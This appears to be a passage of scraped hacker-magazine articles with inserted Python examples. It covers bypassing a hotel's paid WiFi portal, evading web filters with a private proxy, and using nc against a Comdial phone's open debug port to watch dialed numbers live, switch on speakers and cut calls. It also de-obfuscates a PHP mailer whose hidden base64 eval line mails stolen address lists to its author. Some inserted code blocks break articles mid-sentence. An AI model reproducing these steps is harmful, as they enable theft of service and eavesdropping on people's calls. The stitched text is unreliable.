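                data = image[start:end + len(footer)]
                pos = start + len(data)
            found.append(CarvedFile(ftype, start, data))
    return found


def write_recovered(files, outdir: str):
    """Lay results out the way Foremost does: <outdir>/<type>/NNNNNNNN.<type>
    plus an audit.txt naming every carved file with its offset and length."""
    written = []
    with open(os.path.join(outdir, "audit.txt"), "w") as audit:
        for n, f in enumerate(files):
            typedir = os.path.join(outdir, f.ftype)
            os.makedirs(typedir, exist_ok=True)
            path = os.path.join(typedir, f"{n:08d}.{f.ftype}")
            with open(path, "wb") as fh:
                fh.write(f.data)
            audit.write(f"{path}\toffset={f.offset}\tlength={len(f.data)}\n")
            written.append(path)
    return written


def build_sample_image() -> bytes:
    """Constructed stand-in for a dd image of a memory card: two tiny JPEG
    shells and a PNG shell separated by filler.  Not a real capture."""
    jpg1 = b"\xff\xd8\xff\xe0" + b"JFIF-one" * 4 + b"\xff\xd9"
    jpg2 = b"\xff\xd8\xff\xe1" + b"Exif-two" * 8 + b"\xff\xd9"
    png = b"\x89PNG\r\n\x1a\n" + b"IHDR" + b"\x00" * 13 + b"IEND\xaeB`\x82"
    filler = bytes(range(256)) * 4   # 1024 bytes containing none of the signatures
    return filler + jpg1 + filler + png + filler + jpg2 + filler


if __name__ == "__main__":
    import tempfile
    out = tempfile.mkdtemp(prefix="recovered-")
    for path in write_recovered(carve(build_sample_image(), ("jpg", "png")), out):
        print(path)
```

Real carvers also cope with EXIF thumbnails (a JPEG header nested inside a JPEG) and fragmented files, which is where the audit file earns its keep when you check what was actually recovered.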
Hacking Dubai and More Internet Proxy Loopholes
by forgotten247

I recently had the opportunity to go to Dubai for a work function. I was put up at the Jumeirah resort, a nice little spot on the gulf with some great views, restaurants, and clubs. As any reader of 2600 would do, the first thing I did when I got to the room was see how I could get online.

On the desk was a card outlining the process to do so. I could plug in an Ethernet cable, go through a few screens, and once registered I'd be able to use wired or wireless access throughout the resort. Just what I needed, beach-side WiFi to enjoy the net and the Gulf at the same time.

No worries, I thought, and I started the process by disabling the Airport on my MacBook Pro, plugging in the Ethernet cable, and firing up Safari. I was prompted with a "Jumeirah Hotel Internet Access" landing page, and then clicked on the "Internet Access" link. From there I chose "In-House Guest" and accepted the terms and conditions which were pretty standard.

Then something hit me about the page to register my system. You'd think a hotel that charges $1,000+ US dollars a night (yes, it was that expensive) would throw in Internet access, but no, they didn't. The screen that came up would allow users to register for one hour of Internet access for $30 AED (about $8 US) or $150 AED ($40 US) for 24 hours. After paying, the system would provide a username and password that could then be entered into a form on the web system to gain access. This was a bit of a surprise seeing as the card on the desk made no mention of the added cost, but I was game to see if there were any unique ways to gain access.

To get started I disconnected the Ethernet cable, switched to Airport, and went to the landing page to enter a random username and password. I had no luck there. OK, try number two, would entering a name with a blank or random password work? Nope. I had no intention of paying $40/day for Internet access for the next week, even at my company's expense, so I pulled out my iPhone to see if I could get cell-network web access. Having a US-based iPhone locked for AT&T meant no luck in that arena. I also had a BlackBerry and it worked fine on the local provider network, however I didn't want to browse using BlackBerry's watered-down web interface.

Things were starting to look grim, but I was not willing to give in. I joined the iPhone to the hotel WiFi setup and went through the registration pages, hoping for some luck. I noticed differences on the page when viewed through iPhone, from what I had seen on the laptop. Mainly, quite a few sections of text that had been present on the laptop didn't show up on the iPhone. Instead there was an icon that indicated there was content that the mobile Safari browser could not load. This looked promising. I finished going through the registration pages and then I got it. On the page where the laptop's browser was prompting me to select the amount of time I wanted to pay for, I received a message saying that the registration process was completed, and I was in. I quickly typed in a few URLs and indeed I was online.

It seemed the registration and access granting pages were dependent on web components that were not compatible with mobile Safari. Using that knowledge as a jumping point, I was able to find that the web application used to provide Internet access used Java components. For whatever reason the developers had decided that instead of failing closed (meaning if there was an error with the application, no access would be granted), they failed open. When the Java components didn't run, the system defaulted to letting people through and granting access. Dummies!

Now I do think the iPhone is a great little device, but I didn't want to do all my surfing on my phone, so with a little help from the tinyproxy native application I had installed on
it (you had to assume it was jailbroken, didn't you?) I pointed my laptop to use the iPhone as a proxy and off I went, free WiFi access across the iPhone to the laptop. Before I left I circled back to validate the security hole that allowed this, and found that disabling Java on a browser on the laptop resulted in the same full access without needing to go through the registration process. I also noticed that in the areas of the hotel where there were business meeting rooms the WiFi networks were completely unrestricted, which I found is the case at most business/convention centers and worth noting, although not much good to get online from the privacy of your room, or the allure of the beaches.

The moral of this segment of the story is twofold: First, if you run into any WiFi apps requiring registration, make sure to test them out without things like Java or ActiveX disabled because you may be pleasantly surprised; Second, a word to developers, you really need to think beyond end-users accessing the network on traditional setups and should always fail closed when in doubt.

Now, the digital adventures in Dubai didn't stop there. After browsing a few sites I ran into a nasty little page telling me "SITE BLOCKED", in big bold red letters, with sub-text, "We apologize the site you are attempting to visit has been blocked due to its content being inconsistent with the religious, cultural, political and moral values of the United Arab Emirates." Just for good measure it was written in English and Arabic. Now, I can say for sure that there are plenty of sites I go to on a regular basis that are inconsistent with the moral values of the UAE, so, let's get around this thing shall we? This one was not too difficult, as I have run into similar blocks in China and other heavily regulated areas.

[Screenshot: the UAE "SITE BLOCKED" page, in Arabic and English: "We apologize the site you are attempting to visit has been blocked due to its content being inconsistent with the religious, cultural, political and moral values of the United Arab Emirates. If you think this site should not be blocked, please visit the Feedback Form available on our website."]

The way these typically work is using web proxy servers or appliances with filtering technology which classify sites by type. Access is then allowed or denied based on type. SmartFilter, as covered in the Spring 2008 issue, is one of these technologies. The article did a good job of describing a solution to get around SmartFilter, but it was a bit overcomplicated for my liking. First, it relied on people having an Internet-facing host that you could get shell access on. You also needed the ability to fire up an ssh listener on that server, and to set up a SOCKS proxy on your client system. While this certainly is a viable technical solution, and an educational article, the assumption that people have access to an Internet-facing server they can set a service up on is a bit beyond reality, even for 2600 readers. If you are in a corporate environment there is a good chance that the PC policies won't let you install PuTTY or run unapproved services on the client. Places with Internet proxy filters typically also have some level of infrastructure monitoring going on, as well as security policies enforced through Active Directory and/or PAC files that won't allow installation of software or changing your web
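Returning to the registration app's fail-open behaviour: the following added example (hypothetical code, not the hotel's application) models the decision the portal got wrong, shows the one-line fail-closed fix, and shows why the decision should rest on a server-verifiable token rather than on anything a browser-side component reports; the token format, field names and key are constructed.

```python
"""Fail-open versus fail-closed access decisions for a captive portal.
Hypothetical code illustrating the bug described in the article."""
import hashlib
import hmac

SECRET = b"portal-signing-key (constructed value)"   # constructed, server-side only


class ComponentError(Exception):
    """The browser-side component never reported a result (e.g. no Java)."""


def issue_token(username: str, expires_at: int, secret: bytes = SECRET) -> str:
    """Server side: after payment, hand out a token the server can verify later
    without trusting anything the browser computes.  Constructed format."""
    msg = f"{username}:{expires_at}"
    return msg + ":" + hmac.new(secret, msg.encode(), hashlib.sha256).hexdigest()


def verify_token(token, now: int, secret: bytes = SECRET) -> bool:
    """True only for an unexpired token carrying a valid signature."""
    try:
        username, expires_at, sig = token.split(":")
        expires_at = int(expires_at)
    except (AttributeError, ValueError):
        return False            # missing, malformed or tampered: never "unknown"
    msg = f"{username}:{expires_at}".encode()
    expected = hmac.new(secret, msg, hashlib.sha256).hexdigest()
    return hmac.compare_digest(sig, expected) and expires_at > now


def component_result(form: dict) -> bool:
    """Models the original design: a Java component posts component_ok=1 once it
    has done the client-side registration work.  Mobile Safari never ran it."""
    if "component_ok" not in form:
        raise ComponentError("client component did not run")
    return form["component_ok"] == "1"


def grant_fail_open(form: dict) -> bool:
    """The article's bug: an error on the component path is treated as success."""
    try:
        return component_result(form)
    except ComponentError:
        return True


def grant_fail_closed(form: dict) -> bool:
    """Same structure, opposite default: an unknown state denies."""
    try:
        return component_result(form)
    except ComponentError:
        return False


def grant_server_side(form: dict, now: int) -> bool:
    """What the decision should actually rest on: the component is cosmetic,
    only a token the server itself signed grants access."""
    return verify_token(form.get("token"), now)
```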
browser settings.

I have a different approach to getting around Internet filtering proxies that puts less requirements on the users, both on the server and client side. Rather than just give the solution, let's take a walk-through of how we get there. To start with, SmartFilter and other filters are based on the URL or IP of the site you are going to. They do not filter on content, at least none that I have run into yet. This is very important. The default reaction to this knowledge should be that if you can't get to a site because the host is blocked, go to a site on a host that isn't blocked that you can get the content through.

Let's try that out. Hop on over to Google, I haven't found them blocked yet, and type in a search that would result in the URL you want to view. On the search results screen instead of clicking on the title of the page, click on the "Cached" link. Sweet, I'm in, are you? Probably. The cached content is served from Google's servers which are not blocked, since the host name in the URL is for Google, not the host which the proxy doesn't like. This is a quick and dirty way to get to a single page that is blocked, but Google's cache isn't always complete, following links from it isn't always easy, and the pages don't always render correctly.

Let's keep going down with the intention of getting access to all the content, not just the cached image of the blocked host. Most of you should be well aware of anonymizer sites that you can go to, enter a URL, and proxy the content through their servers. The intention of these sites is to improve your security so the web servers don't know who is making the request, however they can also be used for you to get content from a site, without entering that site's URL. That sounds exactly like what we need, but unfortunately most of these are well known by proxy filters, so going to one of those is not going to cut it. Are we stuck? Nope, we just need an anonymizer site that the proxies don't know about, and the best way to get one is to host your own.

Now, writing a web app to do this is very simple, but it is even easier just to implement one that already exists. I mean why spend time doing something that's already been done. Much like the prior article on getting around SmartFilter, you do still need some Internet-facing server space for this, but it can come in the form of a simple, low cost web hosting provider. No shell access or ability to run services needed. Just a provider supporting PHP or ASP, which almost any decent provider will support.

The first thing needed is to set up the Internet-facing server side. Jump out online and do a search for "web proxy <web language>" where the web language is PHP or ASP, depending on the host you are using. PHProxy (http://sourceforge.net/projects/poxy/) is one that comes to mind for PHP, and is near the top of the search results right now, although that one is a little dated. It will work fine, as will almost any others you come across. So, take whichever proxy solution interests you, drop it on your hosted web provider space, which hopefully has a nice inconspicuous host name, and point your web browser to it. Government-enforced proxies, such as Dubai's, as well as business/corporate proxies, should let you slide right by. From there you should just need to type in the URL you want to pull up, click a button, and sit back as the page you wanted is displayed in its full form. Hopefully the web proxy you grabbed dynamically updates any HREF links so as you navigate around, all future clicks go through your proxy. If it didn't, grab a different one. Most support doing this.

The beautiful part of this approach is that as long as the host name you are running your proxy from doesn't raise any suspicion, there would be no reason to have to change your browser settings on the client. This is great if you are in a work environment where those settings are locked down.

One word of caution for business users though, SmartFilter and other web proxy solutions typically are used to provide reports on the most visited websites, and the most active Internet users. You should try to fly under that radar by only using your proxy when absolutely necessary, and keep browsing from work at a minimum. The name of your host is important as well. If it does pop up on one of those reports the more official it looks the better. Don't register "iusethistobypassmyworksecurity.com" or "myporngateway.com" or you may not be in that job long enough to use it!

So, that concludes this chapter of my Dubai adventures and another method of getting around Internet proxy filters. I enjoyed that week of sun, free net access, and freedom to digitally go wherever needed. All thanks to a poorly written WiFi registration app, an iPhone, and a personal web proxy gateway.

I do have to add that spending too much time in front of your system in Dubai would be quite a waste. Anyone who can get there should plan on not sleeping too much - hitting the beaches all day and partying at the clubs all night is the only way to go, even when your online exploits or World of Warcraft buddies are calling. Just save up, Dubai isn't cheap!
by Metalx1000
metalx1000@yahoo.com

For those who are unfamiliar, Comdial phones are Session Initiation Protocol (SIP) phones that are used in offices. Instead of traditional phone lines, these phones connect to your local network via CAT5. Although I have not worked with Cisco phones, from what I have read they are similar.

In this article I will be talking about model "CONVERSip EP300", although I'm sure that these techniques will work on other models. The first step in exploring the phone is to find its IP address. There are two ways of doing this. The first way is to walk right up to the phone and get the information.

To do this look at the LCD screen on the front of the phone. Right below the LCD screen are three buttons. Each corresponds with a menu option on the screen. The three default options are "VMAIL" (Voice mail), "DND" (Do Not Disturb), and "MENU". Let's choose "MENU" then "NEXT". When you see "2 Info" on the LCD screen press "ENTER". Now press "NEXT" twice. This brings you to a screen that says, "3 System Info". Press "ENTER" and you will see "1 Network Info". Press "ENTER" again. Press "NEXT" three times and your screen will say, "4 IP Address". Press "ENTER" one last time and you will see the IP address of the phone.

Now, if you can't physically get to the phone, you can find it easily with nmap, a great tool for scanning networks. I'm not going to go into detail on nmap, as there have been plenty of articles written on it, and there is plenty of info available on the web. Once you run a full scan on the phone with nmap you will find that ports 8001, 8002, 8003, 9026, 9027 are open. Ports 8001, 8002, 8003 I believe are used for the communication itself. Port 9026 asks for a user name and password, which I don't know, but if I find them I will let you all know. Finally we get to port 9027, which we will be looking at today.

I will be using NetCat in this tutorial, but telnet or similar programs will work as well. Let's say our IP address is 192.168.22.237, we would connect to the phone with NetCat and you would get the following output:

/home/user> nc 192.168.22.237 9027
[17:17:12.428] command_poll: got listenfd event
[17:17:12.439] command_poll: action->fd_ptr=9 accepted
[17:17:12.439] Connected to station 237
[17:17:12.441] Phone Version: 3.0.026
[17:17:12.439] Phone Build Date: 06/05/2008 17:17:12
[17:17:12.439] Phone MD5Sum: 3777ad4b3ac20ae9b56391267e81bb90
[17:17:12.450] Boot Version: 1.04
[17:17:12.451] Boot Build Date: 05/03/2005 22:40:17
[17:17:12.450] Boot MD5Sum: 5b84e34dcf06235e3763c755a9c57e9c

Now that you are connected, type "?" (without the quotes) and press "Enter". This will bring up the help menu as follows:

*** Console commands
[19:42:19.089] @ [destip] - Send debug log to remote syslog at [destip] or turn off if [destip] not specified
[19:42:19.100] ! [agressiveness] - Set speakerphone agressiveness
[19:42:19.100] 0..7 - debug flag level
[19:42:19.099] a - debug flag toggle
[19:42:19.098] A - verbose flag toggle
[19:42:19.099] B - Generate Test Tone on Bzr
[19:42:19.109] c - core selection alt between 1, 2
[19:42:19.109] C - crash write to 0
[19:42:19.108] D - 1 - Si3000, Default - Dump DSP statistics
[19:42:19.109] d - increase dspDriverVerbose (wrap around range 0-3)
[19:42:19.108] E - Dump EPROM info
[19:42:19.110] e - Dump Ethernet stats
[19:42:19.118] e 0 - reset Ethernet stats
[19:42:19.119] g - gdb spin loop
[19:42:19.120] H - Switch to Headset
[19:42:19.118] h - Switch to Handset
[19:42:19.120] I - Switch to Mic/Spkr
[19:42:19.119] i - Adjust mic input gain (@DSP) +1dB (wraps around)
[Help menu, continued; the timestamps and a few entries are unreadable in the scan]
k - info
K - ticks since last key event
L - LED test
M - Increase ADC Rx (Mic) gain +1
m - Decrease ADC Rx (Mic) gain -1
s - print station number of this phone
T - Mute ALL Input and Outputs
t - Generate DSP tones
U - Inc spkr Vol. (Dec Attenuation)
u - Dec spkr Vol. (Inc Attenuation)
V - Inc ADC Tx PGA (O/P) gain +1
v - Dec ADC Tx PGA (O/P) gain -1
W - Inc ADC Tx PGA (I/P) gain +1
w - Dec ADC Tx PGA (I/P) gain -1
X - Inc ADC Line-Out gain (Dec Attenuation)
x - Dec ADC Line-Out gain (Inc Attenuation)
Y - Increase Line In gain
y - Decrease Line In gain
z - Test LCD/Notify msgs
Z - Play L tone

Each of the letters listed run the function indicated, when you type the letter and press "Enter". So if you type "k" and press "Enter," it will dump a bunch of system info to your screen such as mic and speaker volume, numbers dialed, calls received, call times, and a bunch of other info. If someone is using the phone you can use the "u" and "U" command to raise and lower the volume on the phone. Command "I" will switch on the speaker of the phone while "h" will set it back to the headset (this is fun to do if you are in the same room as the person on the phone). "T" will "Mute ALL Input and Outputs", but I don't know how to unmute them unless they hang up and redial. So, only use the "T" command if you want to disconnect someone's call.

Some other commands are not as fun. For example "z" will cause a whole lot of messages to flash on the screen of the phone, but all the messages flash for about one tenth of a second, making it very hard to notice. You may also notice that if someone picks up the headset or presses buttons on the phone while you are connected you will receive some output on your screen. By default the output is mostly useless, telling you that buttons have been pressed, but not which buttons. But, if you change the "debug flag level" by choosing a number from 0 through 7 you can change the amount of information displayed. Level "3" is when things start getting useful. It allows you to see what is being displayed on the LCD screen of the phone. And since the LCD screen displays the numbers being dialed and the numbers of incoming calls, you can see, in real time, who is calling whom.

Of course the more output you have the harder it is to keep track of, especially when you get up to level "6" or "7". This is where your command line skills could come in handy. Using a simple command such as grep you can filter out unwanted info. To only display messages on line one of the LCD screen, which is where numbers being dialed are displayed, set the debug level to at least "3" and try the following set of commands:

/home/user> nc 192.168.22.237 9027 | grep LCDLine1
[20:55:52.687] LCDLine1: ENTER NUMBER
[20:55:53.109] LCDLine1: PRI
[20:55:54.210] LCDLine1: PRI
[20:55:54.728] LCDLine1: 1
[20:55:55.059] LCDLine1: 18
[20:55:55.358] LCDLine1: 180
[20:55:55.518] LCDLine1: 1800
[20:55:55.868] LCDLine1: 18004
[20:55:56.109] LCDLine1: 180046
[20:55:56.299] LCDLine1: 1800466
[20:55:56.449] LCDLine1: 18004664
[20:55:56.608] LCDLine1: 180046644
[20:55:56.808] LCDLine1: 1800466441
[20:55:56.987] LCDLine1: 18004664411

As you can see, the grep command filtered out a lot of unwanted info and showed the number being dialed in real time.

Well, this concludes this tutorial. This is just part one of my COMDIAL articles. I hope to write at least two more. Well, I guess this is where I do shout-outs to people. So, hey Kenn, James, and Eric.
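The grep pipeline above shows the number one digit at a time; this added example (hypothetical code, not from the article) does the same filtering in Python and goes a step further by collapsing the digit-by-digit LCD updates into completed numbers, which is what an auditor would record to show what this unauthenticated debug console discloses. The log lines are constructed after the article's output, with made-up timestamps.

```python
"""Parse Comdial console debug output and reassemble dialed numbers.
Hypothetical code, modelled on the output shown in the article."""
import re

LCD_LINE = re.compile(r"^\[(\d\d:\d\d:\d\d\.\d{3})\] LCDLine(\d): (.*)$")

# Constructed sample in the article's format: line 1 shows the number as it
# is keyed, one digit per message, interleaved with prompt text and line 2.
SAMPLE_LOG = """\
[20:55:52.687] LCDLine1: ENTER NUMBER
[20:55:53.109] LCDLine1: PRI
[20:55:54.728] LCDLine1: 1
[20:55:55.059] LCDLine1: 18
[20:55:55.358] LCDLine1: 180
[20:55:55.518] LCDLine1: 1800
[20:55:56.987] LCDLine2: CALLING
[20:55:56.988] LCDLine1: 18004664411
[20:56:30.100] LCDLine1: ENTER NUMBER
[20:56:31.200] LCDLine1: 5
[20:56:31.900] LCDLine1: 55
[20:56:32.400] LCDLine1: 555
"""


def lcd_events(text: str, line_no: int = 1):
    """Yield (timestamp, text) for every LCDLine<line_no> message; all other
    console chatter (button presses, DSP stats) is dropped, as grep did."""
    for raw in text.splitlines():
        m = LCD_LINE.match(raw)
        if m and int(m.group(2)) == line_no:
            yield m.group(1), m.group(3)


def dialed_numbers(text: str):
    """Collapse the incremental LCD updates into completed numbers.  A number
    is finished when line 1 shows something that does not extend it (prompt
    text, or the first digit of the next call)."""
    numbers, current = [], ""
    for _ts, shown in lcd_events(text):
        if shown.isdigit() and shown.startswith(current):
            current = shown                # still the same number being keyed
            continue
        if current:
            numbers.append(current)        # flush the finished number
        current = shown if shown.isdigit() else ""
    if current:
        numbers.append(current)            # number still on screen at end of log
    return numbers


if __name__ == "__main__":
    print(dialed_numbers(SAMPLE_LOG))
```

Because anyone who can reach TCP port 9027 sees this in real time without a password, the detection side of this story is watching for connections to that port from anything other than the phone management hosts, and keeping the phones on a voice VLAN that workstations cannot route to.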
Hello, and greetings from the Central Office! It's right around winter solstice here in the Pacific Northwest, where the sun comes up at around eight in the morning and sets just after 4 pm. And outside, it's rainy, windy, and miserable. Yes, just another day of relentless winter assault on the outside plant serving my Central Office.

Around here, most people go to work in the dark and come home in the dark in often dangerous driving conditions. Inevitably, a few cars get wrapped around utility poles this time of year, knocking out electric power and telephone service. Making matters worse, they don't call Washington the "evergreen state" for nothing. There are literally millions of Douglas-fir, Sitka Spruce, and Western Red Cedar trees (among others) standing over 200 feet high. Their branches are as large as entire trees in most other parts of the world. When the wind gets up to 100 miles per hour (as it did last year during the Hanukah Eve storm), falling branches can take out utility lines just as easily as falling trees. When phone lines aren't being knocked down one way or another, they're being pelted by rain, whipped by wind, and even stolen by thieves motivated by the high price of copper. Add to that the fact that telephone cables can be decades old, and it's sometimes a wonder that anything ever works at all.

A switch is no good if you don't have a continuous loop to it, and most of that loop is what we call the "outside plant." Why outside? It's outside my Central Office. Everything in here - the switch, frame, battery room, etc. (where it's loud, dry, and a balmy 68 degrees) - is the "inside plant." And outside it is... literally millions of miles of cable crisscrossing the globe and linking nearly every household in North America. Long distance trunks are redundant, and networks are designed in ring topologies such that a cable carrying your telephone call can literally be cut in two without any impact to your conversation. Many interoffice trunks are similarly designed. Unfortunately, the most vulnerable part of the network is the loop between the Central Office and your house.

Telephone cables typically either run on poles or underground. Inside of a cable, there are up to 4,200 twisted copper pairs. A pair of thin copper wires, known as tip and ring, is what brings a dial tone to your house. This forms a continuous (albeit often spliced) copper loop between the NID on the side of your house and the frame inside the Central Office. Inside a cable, up to 100 pairs are grouped together in a collection called a "bundle," which is wrapped in an inner sheathing, and then the bundles are wrapped together in a tough outer sheathing. There are many different types of sheathing, and the type used largely depends upon the area in which a cable is deployed and the age of the cable. For example, in Brazil (where termites are a huge problem), specialized termite-resistant outer sheathing is often used.

Hungry termites, of course, aren't the only enemy of a telephone cable, or even the most common one. Here in the Pacific Northwest, the weather is the biggest issue for linemen to contend with. Whether a line is downed by a fallen tree or crashed automobile, police and fire departments are often the first ones to respond. Safety is a major concern of first responders, as they don't always know whether a downed line is a dangerous high-voltage electrical line or a relatively benign telephone line. Fortunately, there is a service called One-Call, formally known as the Utility Notification Center. By dialing the appropriate telephone number, first responders report downed lines to One-Call as soon as they arrive on the scene. Based on the address and/or other identifying data (such as number plates on the affected telephone pole), One-Call then notifies the affected utilities of the outage, who each respond by rolling a truck.

Anywhere from a few minutes to several hours later (depending upon how nasty the weather is and whether the technician called is union or not - somehow, non-union techs don't seem to like getting up at 3 am in nasty weather for the measly $11 per hour their companies pay them), a truck will roll up to the scene. If multiple lines are down, multiple trucks from multiple utilities will roll. Unfortunately, if a power line is down, nobody
  • 14. can start repair work until the power utility shows up to de-energize the line. Cable damage resulting from weather isn't always as dramatic as drunks crashing into telephone poles or tree limbs crashing onto lines. Oftentimes, it happens slowly over many years. Copper does corrode when exposed to moisture, and sheathingon its ownis insufficient protection against the elements. In particular, this is the case when cables are older than my mother (as is the case in parts of New York City), and are wrapped with little more than treated paper. As anyone who has ever visited Manhattan knows, there are underground steam lines everywhere - and they leak. This blasts hot, moist steam at anything in the vicinity, including telephone cables. Verizon solves the problem there by pressurizing underground cables with cold nitrogen, delivered from tanks placed throughout the city. This keeps cables dry and mitigates the corrosive impact of steam, as nitrogen is an inert gas. Similar tanks are used by AT&T in the Houston area, due to the moist climate there. You can see them placed at many junction and other equipment boxes. Conversely, in desert areas, such as the Valley of the Sun in Arizona, no measures beyond heavy-duty sheathing are taken to protect cables. This is because what little rain falls in the area evaporates quickly, and rarely penetrates far enough (or hangs around long enough) to result in corrosion damage. Here in the Pacific Northwest, nitrogen tanks are rarely used. Most of our outside plant dates from the 1960s or later, although in a handful of places there is still cable in use dating from the turn of the 20th century. In this area, most cables are filled with a substance called icky-pic. How did it get its name? Well, icky-pic is the vilest substance known to mankind. If you get it on your clothes, in your hair, etc., you'll never get it out. It sticks to everything, ruining whatever it touches. 
Including your eyes; if you get it in your eyes, it will literally blind you. Oh, and to top it off, the stuff is actually flarnmable (being petroleum based), so it should never be used indoors. But icky-pic is inert, and water can't penetrate it, and it's flexible (because it's a gel) so you can fill cables with it. So for this area, it's a perfect solution. That is, until the outer sheathing of the cable eventually ruptures after 40 years of neglect and the icky-pic leaks out. Eventually the cable will corrode, and a splicer will have to repair the damage. Splicers, incidentally, repair all sorts of interesting damage, on both fiber-optic and copper cables. From euphemistically named "backhoe incidents" (yes, any idiot with a backhoe can knock out phone service to over 1,000 homes) to underwater lines caught by boat anchors to more garden-variety damage such as drug addicts cutting out sections of cable to sell as scrap (yes, this really happens), these folks have a very tough job. Piecing 4,200 individual pairs back together is a very detail-oriented job, but good splicers need to work fast. After all, if a splicer is on the job, it usually means a lot of folks are without phone service. Working as a lineman can be a dangerous job, since it involves working around electrical cables and more than occasionally working around slipshod, improperly grounded cabling done by low-bidding non-union contractors. For example, bucket trucks come in grounded and non-grounded versions, so, as you might imagine, it's highly important for linemen to know which tool is appropriate for the job. While linemen are not electricians (different union), they are trained in the portions of the National Electrical Code (NEC) applicable to their jobs. Safety meetings, while both frequently required and the bane of any lineman's existence, are an important tool used to communicate the latest procedures and information. 
And with that, it's time for me to take a nap here at the Central Office. Safety meetings are the bane of my existence too, and I have a required one today. But it's online, so I can sleep through it without anyone noticing!

References
• http://www.callbeforeyoudig.org/ - One-Call Utility Notification Center for the Pacific Northwest.
• http://www.arkema-inc.com/index.cfm?pag=633 - Description of termite-resistant cable sheathing.
• http://gothamist.com/2008/01/31/nitrogen_tanks.php - Article on nitrogen tanks in New York City. In particular, see the comments from SplicingDan.
• http://www.psihq.com/iread/strpgrnd.htm - Proper grounding is very important in outside plant. This is a great walkthrough of the NEC (National Electrical Code) requirements for grounding.
• http://www.sundance-communications.com/cgi-bin/ultimatebb.cgi?ubb=get_topic;f=31;t=000009;p=0 - Great message board thread on proper grounding of punch-down blocks, which is particularly interesting because of the interplay of issues that can occur during backhoe incidents. Incidentally, this particular message board is very informative on the subject of outside plant.

Page 14 ------------------ 2600 Magazine
by Cliff

Imagine you're a lame web designer. How do you protect your precious HTML, as if nobody's ever seen HTML before? Imagine you're adding some kind of validation to a web page, but you don't want the validation algorithm to be publicly visible. Or you're trying to hide your malicious code in an otherwise innocuous page? You use obfuscation.

Obfuscation doesn't make code impossible to read, it just makes it a pain in the ass, and not worth bothering with for the average user. The great thing with scripting languages is that they are interpreted plaintext. In order for the script to run, it has to be human-readable at some stage - all you need to do is to de-obfuscate it, and read what the author didn't want you to read. The more someone doesn't want me to read something, the more curious I become!

Common scripting languages include PHP, VBScript, and JavaScript. Each has its own syntax and use, but they have lots of common programming constructs. For instance, PHP runs on the server, but not on a browser, JavaScript can run on either, and VBScript is most suited to server-side execution. The one instruction every code obfuscator uses is eval(), which works just about the same in each of these languages. eval("string") will execute the code contained in the string variable "string", whatever it may be. That code may be in cleartext, or it may be a short program to hide the cleartext using other functions, which vary with the scripting language used.

Here's a simple, real-life sample I took from a PHP script. This PHP script was called the "Yoga0400 Mass Mailer." It was forwarded to me by someone who found a copy on their honeypot. It was a generic PHP HTML interface for the box's own SMTP server, and it looks as if it was handed out freely to spammers to use as a service to humanity. Some service - it contains a line:

echo eval(base64_decode("bWFpbCgiZ3JvZmlfaGFja0Bob3RtYWlsLmNvbSIsICRzdWJqOTgsICRtc2csICRtZXNzYWdlLCAkcmE0NCk7"));

Which made me curious - what did it do that someone who gives away a spamming script might want to keep a secret? This was an easy one, and feel free to play along at home... I looked up PHP's base64_decode function, and thanks to the excellent http://php-functions.com/ and similar sites, I was able to decode the string in a blink. Simply copy and paste the string "bWFpbCgiZ3JvZmlfaGFja0Bob3RtYWlsLmNvbSIsICRzdWJqOTgsICRtc2csICRtZXNzYWdlLCAkcmE0NCk7" (without the quotes) into the base64_decode box and hit "Submit". You should see the result:

mail("gxxxx@hotmail.com", $subj98, $msg, $message, $ra44);

(OK, so I've x'ed out a few characters, you can find them yourself if you care to.) This secret script would take a copy of all the email addresses the spammer was using, and send it to gxxxx@hotmail.com - gxxxx was using this giveaway tool to build up his own spam lists! No honor amongst thieves. For what it's worth, I believe Hotmail killed that address off a while ago. It's very hard to shed a tear for someone stealing a spam list from another spammer; either way it's the innocent inboxes that get hosed!

This was an example of the base64_decode() function in PHP being used to obfuscate cleartext code. Another commonly used function is gzuncompress(),
another layer of trying to hide what happens beneath the covers. For instance, a very innocent looking three lines that I've snipped heavily here - one of those three lines is very, very, very long indeed - would have filled several pages of 2600 for just that expression. It's the obfuscated bit:

<?php // This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited.
$OOOOOOOOO=__FILE__;$OOOOOOOOO=__LINE__;$OOOOOOOOO=42896;eval(gzuncompress(base64_decode('eNplj8duwkAYhF«snip about 300 chars»T47xDRfgD5Al8g')));return;?>
GYQYAfsKIOEW/cBaMlxrEmJqy6xkdCvAsLRv6TViHHeQFVmVAsp«snip about 40kb of similar stuff»7G/T/ntYYFI==

The first line is easy - someone prohibiting me from seeing what code they want to run on my computer? I ignored it, so sue me. Next we have a few variable declarations in a single line. Unkindly, the person obfuscating the code used a real mix of characters here - Courier New renders them all the same (see above), so let's try a different font. Wingdings shows us what's going on here rather well:

[the same declarations set in Wingdings, where the letter O and the digit 0 get visibly different glyphs]

That seeming $OOOOOOOOO is actually a mix of O's and zeroes, slippery. Of course, the second and third variable are different mixes of O's and zeroes. This is clearly going to be a battle, lucky I'm so obstinate! I did a bit of renaming myself:

//$OOOOOOOOO=__FILE__;
$file=__FILE__;
//$OOOOOOOOO=__LINE__;
$line=47;
//$OOOOOOOOO=42896;
$offset=42896;

I figured $file, $line and $offset would be more useful names initially to get me rolling, and so used search and replace, and not for the last time. Particularly neat was the use of __FILE__ and __LINE__, which meant adapting the code would damage it, hence the hard-coded value for $line. I worked out why it was so important, and what the line number would be once I'd tidied the code up. This was a very clever obfuscation! Continuing, I tidied the code a bit:

$a1='eNplj8duwkAYhF/GOu4qRlmI44AsH+idpbdL5PK7gBu7LsDTBxREhKKZ02jmkOZilFJ2E9WdOIEIS4yx30BG3EREKzw/AFwqSexevJs4LqQCS8+pXKYVhWj/YoXWVKLdiI+17l6zylrDhIMQ2DQEqMq3DVZsAxYpTzl20Bj2C6JKiYzaUQr8EmfFOZv3dsPJhq2WdaNhNq2W3XG6bt8fHEbBOJwms9NCrPPteX+l5cqH8ql+VWtv7zq5Ub3RbLU73V5/MByNJ2w6my+Wq/Vmu9sbpmWD43r+4RiEUZycuEizvDhfXhiIEKJBbgT47xDRfgDSAl8g';
$a2=base64_decode($a1);
$a3=gzuncompress($a2);
// eval sequence $a3

Next I did the base64_decode(), then using a 30-day trial of a PHP debugger, did the gzuncompress on the result. What I got was...

$OOOOOOOOO=fopen($OOOOOOOOO,'rb');
while(--$OOOOOOOOO)fgets($OOOOOOOOO,1024);
fgets($OOOOOOOOO,4096);
